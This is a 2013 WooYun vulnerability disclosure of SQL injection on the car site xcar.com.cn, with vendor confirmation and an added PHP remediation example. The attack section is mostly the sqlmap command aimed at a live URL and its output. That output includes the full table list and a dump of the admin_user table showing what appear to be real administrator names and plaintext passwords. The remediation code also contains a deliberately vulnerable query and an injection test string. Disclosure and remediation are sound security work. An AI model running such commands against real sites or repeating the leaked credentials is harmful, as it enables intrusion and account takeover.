
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-041629

Title: SQL injection vulnerability in 爱卡汽车网 (xcar.com.cn)

Affected vendor: 爱卡汽车网

Author: sql

Submitted: 2013-11-01 11:19

Fix time: 2013-12-16 11:20

Public disclosure: 2013-12-16 11:20

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-11-01: Details sent to the vendor, awaiting vendor handling
2013-11-01: Vendor confirmed; details disclosed to the vendor only
2013-11-11: Details disclosed to core white hats and domain experts
2013-11-21: Details disclosed to regular white hats
2013-12-01: Details disclosed to intern white hats
2013-12-16: Details disclosed to the public

Brief description:

A SQL injection vulnerability in 爱卡汽车网 (xcar.com.cn)

Detailed description:

Injection point (the `pic` parameter):
http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871
sqlmap.py -u "http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871" --current-db

(screenshot: QQ图片20131031220130.jpg, sqlmap output for --current-db)


Database name: xcardb2
Tables:

(screenshot: 2222.jpg, sqlmap table listing)


[201 tables]
+----------------------------------------+
| ad_tf |
| ad_time |
| ad_type |
| ad_value |
| ad_wz |
| adb_blc |
| adb_car |
| adb_carer |
| adb_chewang |
| adb_sh |
| adb_toyota |
| adb_vote |
| admin_user |
| ads_acls |
| ads_adclicks |
| ads_adstats |
| ads_adviews |
| ads_affiliates |
| ads_banners |
| ads_cache |
| ads_clients |
| ads_config |
| ads_images |
| ads_jyk |
| ads_session |
| ads_targetstats |
| ads_userlog |
| ads_zones |
| article_text |
| article_text_copy |
| article_tpl |
| article_type |
| article_value |
| article_zt |
| auto_pic |
| automarket_activity |
| automarket_amarket |
| automarket_bidden |
| automarket_finance |
| automarket_group |
| automarket_index |
| automarket_level |
| automarket_obidden |
| automarket_quote |
| automarket_sesslib |
| automarket_user |
| bbs_avg_forums |
| bbs_forums |
| bbs_jiafen_log |
| bm |
| car_test |
| cardb_brand |
| cardb_car |
| cardb_color |
| cardb_innercolor |
| cardb_pic |
| cardb_series |
| cardb_type |
| chat_ad |
| chat_cs |
| chat_gg |
| chat_jb |
| comment_blacklist |
| comment_main |
| comment_reply |
| comment_sub |
| days_info |
| days_route_info |
| days_site_info |
| dc_gmi |
| dc_gr |
| dc_type |
| dc_value |
| dc_wt |
| dc_xx |
| diaocha_user1 |
| diaocha_user2 |
| diaocha_user3 |
| diaocha_user4 |
| diaocha_user5 |
| diaocha_user6 |
| edm_url |
| expert_online |
| fks_faxing_game |
| gd_url |
| huifu |
| hy_city |
| hy_zl |
| ir_dc_qc |
| ir_xcar |
| junjie18_expert_online |
| lan_gg |
| live_chat |
| log_time |
| mycon_login |
| news_sina |
| news_stardy |
| news_temp |
| news_url |
| news_wenxin |
| news_xinhua |
| page_hit_info |
| peugeot_expert_online |
| pic_url |
| prius_expert_online |
| ren_url |
| road_book |
| road_city |
| road_vote |
| route_info |
| shuanglong |
| stra |
| survey_count |
| survey_h3 |
| tid_map_newsid |
| time_zt |
| tj_dc |
| topic_5year_answer |
| topic_5year_member |
| topic_5year_question |
| topic_5year_sign |
| topic_5year_star |
| topic_5year_tiger |
| topic_5year_times |
| topic_pic_bxjg |
| tracert_switch |
| type_url |
| x_news_comment |
| xcar_Complaints_list |
| xcar_adb_service_org_add |
| xcar_adb_service_org_details |
| xcar_adb_service_org_users |
| xcar_adb_succor_detail |
| xcar_adb_succor_id |
| xcar_aoyun |
| xcar_area_activities |
| xcar_area_activities_person |
| xcar_bbs2cardb |
| xcar_bbs_avg_forum |
| xcar_bbs_digest |
| xcar_bbs_digestclass |
| xcar_bbs_hot |
| xcar_bbs_hot070117 |
| xcar_bbs_hot_20060327 |
| xcar_bbs_hot_20090622 |
| xcar_bbs_hot_allmax |
| xcar_bbs_hot_allmax_copy |
| xcar_bbs_hot_copy |
| xcar_bbs_hot_fidhourmax_20051125222400 |
| xcar_bbs_hot_forummax |
| xcar_bbs_hot_forummax_copy |
| xcar_bbs_hot_temp |
| xcar_bbs_hot_temp_test |
| xcar_blog_admin |
| xcar_blog_article_comment |
| xcar_blog_article_list |
| xcar_blog_message_list |
| xcar_blog_user_list |
| xcar_bx_post |
| xcar_bx_user |
| xcar_car_pull_usr |
| xcar_car_url |
| xcar_chezhan_admin |
| xcar_chezhan_result |
| xcar_comment |
| xcar_dc |
| xcar_examin |
| xcar_examin_pic |
| xcar_machao_tmp |
| xcar_manage_baiban |
| xcar_member_hot |
| xcar_photography |
| xcar_pinche |
| xcar_play_hp |
| xcar_praise |
| xcar_praise_log |
| xcar_pull |
| xcar_pull_car |
| xcar_question |
| xcar_reseach_question_info |
| xcar_research_person_info |
| xcar_sale_buyer |
| xcar_sale_pra |
| xcar_small_message |
| xcar_small_message2011 |
| xcar_survey_diantong |
| xcar_topic_login_user |
| xcar_topic_per_info |
| xcar_topic_relation |
| xcar_topic_users_jilu |
| xcar_topic_vote_result |
| xcar_topic_vote_value |
| xcar_user |
| xcar_user_banned |
| xcar_user_shielding |
| xcar_vote_log |
| xcar_xfdc_question_info |
| xcar_zoo_post |
| xtv_live_info |
| youhao |
| yq_url |
+----------------------------------------+
Admin table (admin_user):

(screenshot: admin_user.jpg, dump of the admin_user table)


+-------+---------+---------------+-------------+
| id | groupid | pass | name |
+-------+---------+---------------+-------------+
| 1 | 9 | g_i_c_x | ggicc |
| 8 | NULL | hao_1zhi | haozhi |
| 3 | 2 | xiaomin_abis | xiaomin_bak |
| 94815 | NULL | xcar_88508031 | jersonzhow |
| 9 | NULL | kanshale_xzzz | ????? |
| 94816 | 1 | zzzzzz | ?????_bak |
| 23198 | 0 | xcar_8850 | ?????????? |
| 2 | 3 | user_abis | user |
| 5 | 3 | byf_fyb | byf |
| 94817 | 3 | wuwei_10 | wuwei_bak |
+-------+---------+---------------+-------------+

Proof of vulnerability:

Injection point (the `pic` parameter):
http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871
sqlmap.py -u "http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871" --current-db


Remediation:

Filter the input.

Copyright notice: please credit the source when reposting: sql@乌云
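The report's remediation is a single word, "filter". For a numeric lookup parameter like `pic` the concrete form of that advice is to validate the value as an integer and pass it to the database as a bound parameter rather than concatenating it into the query string. The following PHP is an added example written for this page; it is not the site's own `cszp.php` code, whose schema is not shown in the report. The table and column names (`topic_pics`, `id`, `url`), the sample rows, and the in-memory SQLite database are constructed so the script runs offline; the site's own database engine is not named in the report.

```php
<?php
// Added example, not xcar.com.cn's code. Shows the remediation the report
// names ("filter") applied to an integer lookup parameter such as `pic`.
// Table/column names and sample rows are constructed for the demo.

declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database so the script
// runs offline; a production site would use its real DSN instead.
function openDemoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE topic_pics (id INTEGER PRIMARY KEY, url TEXT NOT NULL)');
    $db->exec("INSERT INTO topic_pics (id, url) VALUES "
            . "(715871, '/upload/715871.jpg'), (715872, '/upload/715872.jpg')");
    return $db;
}

// The bug class the report describes: the raw query-string value is
// interpolated into SQL, so any text after the digits becomes part of
// the statement. Kept here only as the "before" for comparison.
function lookupPicVulnerable(PDO $db, string $pic): array {
    $sql = "SELECT id, url FROM topic_pics WHERE id = $pic";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: validate the type first, then bind the value.
// Either step alone stops the injection; together they also turn
// malformed input into a clean "not found" instead of a database error.
function lookupPicSafe(PDO $db, string $pic): ?array {
    $id = filter_var($pic, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;            // reject non-integer input before it reaches SQL
    }
    $stmt = $db->prepare('SELECT id, url FROM topic_pics WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = openDemoDb();

// Normal request: the safe lookup returns the one matching row.
var_dump(lookupPicSafe($db, '715871'));

// Input carrying a trailing SQL clause: the safe lookup refuses it (NULL)
// because it is not an integer, so it never reaches the query.
var_dump(lookupPicSafe($db, '715871 OR 1=1'));

// The same input against the interpolating version returns every row,
// which is what lets a tool enumerate the database as in the report.
var_dump(count(lookupPicVulnerable($db, '715871 OR 1=1')));
```

Run with `php example.php` (requires the `pdo_sqlite` extension). In the real handler the `$pic` argument would come from `$_GET['pic']`; the validation step belongs at that boundary, and the prepared statement should be used for every query the page issues, not only the one the scanner happened to find.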


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2013-11-01 15:57

Vendor reply:

Thanks to white hat @sql for reporting this, thank you; we will deal with it as quickly as possible!

Latest status:

None yet